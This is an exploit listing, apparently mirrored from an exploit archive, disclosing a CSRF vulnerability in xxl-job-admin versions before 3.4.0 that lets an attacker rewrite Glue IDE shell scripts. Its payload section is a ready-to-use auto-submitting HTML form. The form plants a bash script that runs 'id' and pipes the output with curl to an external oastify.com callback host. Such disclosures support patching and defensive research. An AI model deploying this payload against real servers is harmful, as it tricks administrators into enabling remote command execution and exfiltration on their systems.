Share
## https://sploitus.com/exploit?id=PACKETSTORM:226017
## Description
# Summary
A Cross-Site Request Forgery (CSRF) vulnerability exists in the xxl-job-admin web application that allows an attacker to perform unauthorized modifications to Glue IDE shell scripts. The affected endpoint lacks proper CSRF token validation and accepts arbitrary HTTP methods via a permissive request mapping
# Affected Products
```text
xxl-job < 3.4.0
```
# Impact
An attacker can trick an authenticated administrator into making unauthorized changes to Glue IDE shell scripts.
# Proof of Concept
<img width="1280" height="720" alt="Slide1" src="https://github.com/user-attachments/assets/630e6c5f-96ce-4e78-acdc-b65bd401d064" />
<img width="1280" height="720" alt="Slide2" src="https://github.com/user-attachments/assets/8e4ecb6e-a837-48de-8718-d91f6418aa3a" />
<img width="1280" height="720" alt="Slide3" src="https://github.com/user-attachments/assets/f7db38ac-ab21-4db1-b178-1d28fa4492ab" />
<img width="1280" height="720" alt="Slide4" src="https://github.com/user-attachments/assets/9648c354-f35f-432f-baa0-3b29811772f8" />
# Payload
```text
// Decode and change it
<html>
<body>
<form action="https://domain.com/jobcode/save">
<input type="hidden" name="id" value="294" />
<input type="hidden" name="glueSource" value="#!/bin/bash id | curl -d @- http://qic8br6d6om2j459zk4evuimldr4f03p.oastify.com  exit 0 " />
<input type="hidden" name="glueRemark" value="12345" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
Credits to
Ibrahim Sartawi